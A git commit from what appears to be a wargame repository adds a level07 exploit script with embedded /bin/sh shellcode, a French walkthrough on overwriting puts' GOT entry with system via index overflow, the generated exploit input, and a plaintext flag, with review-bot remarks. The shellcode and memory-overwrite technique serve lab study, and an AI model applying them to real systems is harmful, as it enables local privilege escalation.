feat: level07 + level08 elf

gbrochar 2025-06-25 17:41:02 +02:00
parent 3cf1fbf6b9
commit 8b91fc4f30
5 changed files with 103 additions and 0 deletions

45
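--- a/level07/Ressources/script.sh
+++ b/level07/Ressources/script.sh
@@ -0,0 +1,45 @@
+#!/bin/bash
+# shellcode is :
+# \x31\xc0\xb0\x46
+# \x31\xdb\x31\xc9
+# \xcd\x80\xeb\x16
+# \x5b\x31\xc0\x88
+# \x43\x07\x89\x5b
+# \x08\x89\x43\x0c
+# \xb0\x0b\x8d\x4b
+# \x08\x8d\x53\x0c
+# \xcd\x80\xe8\xe5
+# \xff\xff\xff\x2f
+# \x62\x69\x6e\x2f
+# \x73\x68
+IFS=''
+shellcode=(0x46b0c031 0xc931db31 0x16eb80cd 0x88c0315b 0x5b890743 0x0c438908 0x4b8d0bb0 0x0c538d08 0xe5e880cd 0x2fffffff 0x2f6e6962 0x00006873)
+bit_mask=2147483691
+init_addr=43
+for ((i = 0; i < ${#shellcode[@]}; i++)); do
+echo "store"
+echo "$(( ${shellcode[$i]} ))"
+if (( (i + init_addr) % 3 == 0)); then
+echo "$(( i + bit_mask ))"
+else
+echo "$((i + init_addr))"
+fi
+done
+echo "store"
+echo "$(( 0xffffd600 ))"
+echo "$(( -1040108880 ))"
+echo "read"
+#for i in $(seq 0 11); do
+# echo "store"
+# echo "${shellcode[$i]}"
+# echo $(($i + $bit_mask))
+#done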
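Review bot: `bit_mask=2147483691` is not a mask but `init_addr` plus 2147483648 (43 + 2^31), so the two constants are silently coupled and editing `init_addr` alone would leave the `% 3 == 0` branch printing indices that no longer line up with the `else` branch. Derive one from the other, e.g. `high_bit=$(( 1 << 31 ))` and in the branch `echo "$(( i + init_addr + high_bit ))"`, with a one-line comment on why every third index takes the other form. `IFS=''` has no visible effect on the live code, and the commented-out `seq` loop at the end duplicates the live loop (it would not even iterate correctly with an empty IFS); both could be dropped. The literals `0xffffd600` and `-1040108880` in the trailing `store` also deserve a comment naming what they refer to, since nothing in the script says so.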


@ -0,0 +1,42 @@
store
1185988657
43
store
3375487793
44
store
384532685
2147483693
store
2294296923
46
store
1535706947
47
store
205752584
2147483696
store
1267534768
49
store
206802184
50
store
3857219789
2147483699
store
805306367
52
store
795765090
53
store
26739
2147483702
store
4294956544 (-16 pour le vrai 28 au lieu de 44)
-1040108880
store
42
42

1
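--- a/level07/flag
+++ b/level07/flag
@@ -0,0 +1 @@
+7WJ6jFBzrcjEYXudxnM3kdW7n3qyxR6tk2xGrkSC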
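Review bot: This file commits what looks like a level password in plaintext. If the value is accepted anywhere other than a throwaway training VM, it should be treated as exposed from this commit on: deleting the file later does not remove it from history, so rotation is the only remedy. If the repository is required to carry it, a line in the README stating that these are non-sensitive lab flags would keep secret scanners and later readers from having to guess.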

15
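--- a/level07/walkthrough
+++ b/level07/walkthrough
@@ -0,0 +1,15 @@
+-1040108880On peut ecrire que 8 octets sur 12
+"/bin/sh" c'est 8 char avec le '\0' donc ok pour le modulo
+"/bin" => 0x2F62696E => 794978670
+"/sh\0" => 0x2F736800 => 796092416
+system on peut le call avec l'addresse, puis l'argument vers esp+quelque chose.
+-1040108880 Index a store avec 4159090384 (0xf7e6aed0 ou system)
+ca override le plt/got de puts
+override esp pour avoir le bon argument format addr de system BLANC (modulo 3) addr de /bin/sh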

BIN
level08/Ressources/level08 Executable file

Binary file not shown.